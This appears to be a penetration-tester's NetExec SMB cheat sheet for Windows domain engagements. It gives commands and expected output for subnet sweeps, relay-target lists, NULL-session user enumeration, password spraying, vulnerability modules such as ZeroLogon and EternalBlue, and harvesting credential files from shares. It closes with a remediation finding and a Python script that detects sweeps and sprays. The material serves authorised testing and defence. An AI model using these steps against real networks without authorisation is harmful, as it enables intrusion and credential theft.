🛡️ Methodology Checklist
- Subnet sweep: nxc smb [CIDR]/24 → identify live SMB hosts
- Check SMB signing (for relay targeting): nxc smb [CIDR]/24 --gen-relay-list unsigned.txt
- NULL session users: nxc smb [DC_IP] -u '' -p '' --users
- NULL session password policy: nxc smb [DC_IP] -u '' -p '' --pass-pol
- Check password policy lockout threshold BEFORE spraying
- Spray (one password): nxc smb [DC_IP] -u users.txt -p [PASS] --continue-on-success
- Look for (Pwn3d!) in output → indicates local admin
- Run vuln checks: nxc smb [TARGET] -u [USER] -p [PASS] -M zerologon
🎯 Operational Context
Use when: Starting any Windows/AD engagement → nxc SMB recon gives OS version, SMB signing status, domain membership, and share enumeration in one pass.
Think Dumber First: nxc smb [SUBNET]/24 → scan the entire subnet and get OS/signing info for everything. Signing disabled = relay attack viable. Then --shares to enumerate accessible shares. This is the mandatory first step before any Windows attack.
Skip when: N/A; SMB recon should always run at engagement start.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| nxc smb [TARGET_NETWORK]/[MASK] | Sweep subnet → discover SMB hosts, OS versions, domain membership |
| nxc smb [TARGET_NETWORK]/[MASK] --gen-relay-list relay_targets.txt | Find hosts with SMB signing disabled (NTLM relay targets) |
| nxc smb [TARGET_IP] -u '' -p '' | Test NULL session access |
| nxc smb [TARGET_IP] -u '' -p '' --pass-pol | Enumerate password policy via anonymous/NULL session |
| nxc smb [TARGET_IP] -u '' -p '' --users | Enumerate domain users via anonymous/NULL session |
| nxc smb [TARGET_IP] -u '' -p '' --rid-brute [MAX_RID] | RID brute force for user enumeration (when NULL works) |
| nxc smb [TARGET_IP] -u '' -p '' --shares | List SMB shares anonymously |
| nxc smb [TARGET_IP] -u guest -p '' --shares | List shares as guest |
| nxc smb [TARGET_IP] -u [USER_FILE] -p '[PASS]' | Password spray single password against user list |
| nxc smb [TARGET_IP] -u [USER_FILE] -p [PASS_FILE] --continue-on-success | Spray multiple passwords, continue after hits |
| nxc smb [TARGET_IP] -u [USER_FILE] -p [PASS_FILE] --no-bruteforce --continue-on-success | 1:1 credential validation (user[0] with pass[0], etc.) |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] --local-auth | Authenticate with local account (not domain) |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] | Test domain credential validity |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] --shares | List shares + READ/WRITE permissions |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --pattern [KW] | Spider a readable share for filenames matching keyword |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --content --pattern [KW] | Grep file contents across a share for keyword |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] --share [SHARE] --get-file [REMOTE] [LOCAL] | Download a single file from a share |
| nxc smb [TARGET_FQDN] --use-kcache --shares | Enumerate shares with a Kerberos .ccache (NTLM disabled) |
🔬 Deep Dive & Workflow
SMB Sweep → What to Look For
```bash
nxc smb 172.16.5.0/23
# Output columns:
# SMB IP 445 HOSTNAME [version] [domain] [signing] [SMBv1]
#
# Key indicators:
# signing:False → NTLM relay candidate → add to relay_targets.txt
# (Pwn3d!) → admin access confirmed
# domain name → confirms domain controller identity

# Generate relay target list
nxc smb 172.16.5.0/23 --gen-relay-list relay_targets.txt
# → Contains IPs where SMB signing is NOT enforced
# → Feed to Responder + ntlmrelayx
```
NULL/Anonymous Session Enumeration
```bash
# Test NULL session
nxc smb [TARGET_IP] -u '' -p ''
# Success → STATUS_SUCCESS

# Enumerate before spraying (critical → check lockout policy)
nxc smb [TARGET_IP] -u '' -p '' --pass-pol
# → Account Lockout Threshold: 5 → spray max 3 to be safe
# → Observation Window: 30 minutes

# Get user list for spraying
nxc smb [TARGET_IP] -u '' -p '' --users
nxc smb [TARGET_IP] -u '' -p '' --users-export users.txt
# Parse exported JSON user list
sed -i "s/'/\"/g" users.txt && jq -r '.[]' users.txt > userslist.txt

# RID brute (when --users fails)
nxc smb [TARGET_IP] -u '' -p '' --rid-brute 2000
# → Iterates RIDs 500-2000, resolves to usernames
```
Password Spraying Workflow
```bash
# STEP 1: Get lockout policy first
nxc smb [DC_IP] -u '' -p '' --pass-pol
# → or with valid creds: nxc smb [DC_IP] -u [USER] -p [PASS] --pass-pol
# STEP 2: Build user list from NULL enum or prior recon
# STEP 3: Spray safely (stay under lockout threshold)
nxc smb [DC_IP] -u userslist.txt -p 'Company2024!' --continue-on-success
# → Green (+) = success, Red (-) = fail, Yellow (!) = guest access
# → (Pwn3d!) = local admin on target
# STEP 4: Wait observation window before next spray round
# STEP 5: If multiple passwords, use 1:1 mode (no bruteforce)
nxc smb [DC_IP] -u userslist.txt -p passlist.txt --no-bruteforce --continue-on-success
```
Output Interpretation
```text
SMB 10.10.10.5 445 DC01 [+] DOMAIN\jsmith:Password1 (Pwn3d!)
    → valid credential; (Pwn3d!) = local admin access
SMB 10.10.10.5 445 DC01 [+] DOMAIN\jsmith:Password1
    → valid domain cred (no local admin)
SMB 10.10.10.5 445 DC01 [-] DOMAIN\jsmith:Password1 STATUS_LOGON_FAILURE
    → wrong password
SMB 10.10.10.5 445 DC01 [-] DOMAIN\jsmith:Password1 STATUS_ACCOUNT_LOCKED_OUT
    → STOP SPRAYING
```
Vulnerability Scanning via SMB
```bash
# ZeroLogon (CVE-2020-1472) → unauthenticated DC takeover
nxc smb [DC_IP] -M zerologon
# EternalBlue (MS17-010) → unauthenticated RCE
nxc smb [TARGET_IP] -M ms17-010
# PetitPotam → NTLM relay via EFS RPC
nxc smb [DC_IP] -M petitpotam
# noPAC (CVE-2021-42278/42287) → machine account privesc to DA
nxc smb [DC_IP] -u [USER] -p [PASS] -M nopac
```
Readable Share Loot Workflow
```bash
# STEP 1: Enumerate shares + access rights
nxc smb [TARGET_IP] -u [USER] -p [PASS] --shares
# → READ,WRITE / READ / (blank = no access) shown per share
# → Ignore default ADMIN$ / C$ / IPC$ → focus on custom READ shares
# STEP 2: Spider a specific readable share (filenames only)
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --pattern txt
# → Walks the share tree, prints paths matching the pattern
# STEP 3: Search file CONTENTS, not just names
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --content --pattern password
# → --content greps inside files → finds creds in configs, scripts, .xml
# → Combine patterns: run multiple times for pass / cpassword / connectionString
# STEP 4: Download a file you found
nxc smb [TARGET_IP] -u [USER] -p [PASS] --share [SHARE] --get-file "folder\\creds.txt" loot.txt
# → REMOTE path is relative to the share root; LOCAL is the save name
# → Upload counterpart: --put-file local.txt "remote\\path.txt"
# STEP 5: When NTLM is disabled, drive the same flow with Kerberos
export KRB5CCNAME=$(realpath [USER].ccache) # TGT from impacket-getTGT
nxc smb [TARGET_FQDN] --use-kcache --shares
nxc smb [TARGET_FQDN] --use-kcache --share [SHARE] --get-file "folder\\creds.txt" loot.txt
# → MUST target the FQDN with -k/--use-kcache → Kerberos validates the SPN host
# FALLBACK: Impacket smbclient (interactive, when nxc spider misbehaves)
impacket-smbclient -k -no-pass [DOMAIN]/[USER]@[TARGET_FQDN]
# → password auth: impacket-smbclient [DOMAIN]/[USER]:[PASS]@[TARGET_IP]
# → then: shares → use [SHARE] → ls → cd "Sub Folder" → get creds.txt
```
Need a ticket first? See NetExec_LDAP_Kerberos for the impacket-getTGT → .ccache → export KRB5CCNAME flow that feeds every --use-kcache / -k -no-pass command above.
Path Handling Notes
• Spaces → quote the whole remote path: "Program Files\\app.config"
• Separators → SMB uses BACKSLASHES; in bash escape them ("a\\b") or single-quote ('a\b')
• Share vs path → --share is the share NAME; --get-file path is RELATIVE to that share root
• FQDN vs IP → NTLM works with IP; Kerberos (-k/--use-kcache) REQUIRES the FQDN + DNS/hosts entry
• Case → share names are case-insensitive; deep paths from --spider are safest copy-pasted verbatim
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nxc not installed | Wrong package name | Install: pip3 install netexec; command is nxc not crackmapexec |
| SMB scan returns nothing | Port 445 filtered | Verify: nmap -p 445 [TARGET]; nxc falls back to 139 if 445 blocked |
| nxc shows 0 results for subnet | CIDR notation wrong | Use: nxc smb 192.168.1.0/24; ensure /24 not /24. |
| Share enum requires creds | Null session disabled | Use valid creds: nxc smb [TARGET] -u [USER] -p [PASS] --shares |
| nxc version mismatch errors | Old version | Update: pip3 install netexec --upgrade; nxc is actively developed with frequent updates |
| STATUS_NOT_SUPPORTED on auth | NTLM disabled on target (Kerberos-only) | Switch to tickets: export KRB5CCNAME=... then --use-kcache against the FQDN (not IP) |
| KRB_AP_ERR_SKEW | Clock skew > 5 min vs DC | Sync time: sudo ntpdate [DC_IP] (or sudo rdate -n [DC_IP]) before retrying |
| smbclient Kerberos / SPNEGO failure | Local smbclient can't negotiate / no SPN | Use impacket-smbclient -k -no-pass [DOMAIN]/[USER]@[TARGET_FQDN]; ensure FQDN in /etc/hosts and KRB5CCNAME exported |
📝 Reporting Trigger
Finding Title: SMB Reconnaissance Reveals Network Topology and Security Posture
Impact: Unauthenticated SMB enumeration maps all Windows hosts, identifies OS versions, confirms SMB signing status (relay attack viability), and enumerates accessible shares, providing complete reconnaissance data for targeted attack planning.
Root Cause: SMB service exposed on the network without access restrictions; SMB signing not enforced across the environment.
Recommendation: Enable SMB signing on all Windows hosts via GPO. Restrict SMB access to required source networks. Implement network monitoring for SMB scanning patterns. Apply null session restrictions (RestrictAnonymous).
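Added example (not from the original page or from NetExec): the detection side of the two patterns this finding describes, a 445 subnet sweep and a lockout-aware password spray, run over constructed telemetry. The record layouts, thresholds and source addresses are assumptions; the spray window is sized to the 30-minute observation window quoted above.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs). Connection records are
# (timestamp, src_ip, dst_ip, dst_port); logon-failure records are
# (timestamp, src_ip, account, status), mirroring Windows event 4625 fields.
CONNS = [("2024-05-01T09:00:00", "10.10.14.7", f"172.16.5.{i}", 445) for i in range(1, 40)]
CONNS += [("2024-05-01T09:00:05", "10.10.14.9", "172.16.5.10", 445)] * 5  # one normal client
FAILS = [("2024-05-01T09:05:00", "10.10.14.7", f"user{i:02d}", "STATUS_LOGON_FAILURE")
         for i in range(25)]
FAILS += [("2024-05-01T09:05:30", "10.10.14.9", "jsmith", "STATUS_LOGON_FAILURE")] * 4  # typos

def max_distinct_in_window(events, window):
    """events: iterable of (iso_timestamp, key). Return the largest number of
    distinct keys that occur inside any sliding time window of the given length."""
    evs = sorted((datetime.fromisoformat(ts), key) for ts, key in events)
    best, start, live = 0, 0, Counter()
    for ts, key in evs:
        live[key] += 1
        while ts - evs[start][0] > window:  # drop events that fell out of the window
            old = evs[start][1]
            live[old] -= 1
            if live[old] == 0:
                del live[old]
            start += 1
        best = max(best, len(live))
    return best

def detect_sweep(conns, min_hosts=20, window=timedelta(seconds=60)):
    """Sources that touch >= min_hosts distinct hosts on 445 within window: a subnet sweep."""
    by_src = defaultdict(list)
    for ts, src, dst, port in conns:
        if port == 445:
            by_src[src].append((ts, dst))
    return {src: n for src, evs in by_src.items()
            if (n := max_distinct_in_window(evs, window)) >= min_hosts}

def detect_spray(fails, min_accounts=10, window=timedelta(minutes=30)):
    """Sources failing logons against >= min_accounts distinct accounts within window:
    a one-password spray hits many users a few times each, not one user many times."""
    by_src = defaultdict(list)
    for ts, src, account, status in fails:
        if status == "STATUS_LOGON_FAILURE":
            by_src[src].append((ts, account))
    return {src: n for src, evs in by_src.items()
            if (n := max_distinct_in_window(evs, window)) >= min_accounts}

if __name__ == "__main__":
    print("sweep sources:", detect_sweep(CONNS))  # {'10.10.14.7': 39}
    print("spray sources:", detect_spray(FAILS))  # {'10.10.14.7': 25}
```

A source that stays under the lockout threshold per account still shows up here, because the count is of distinct accounts, not attempts per account.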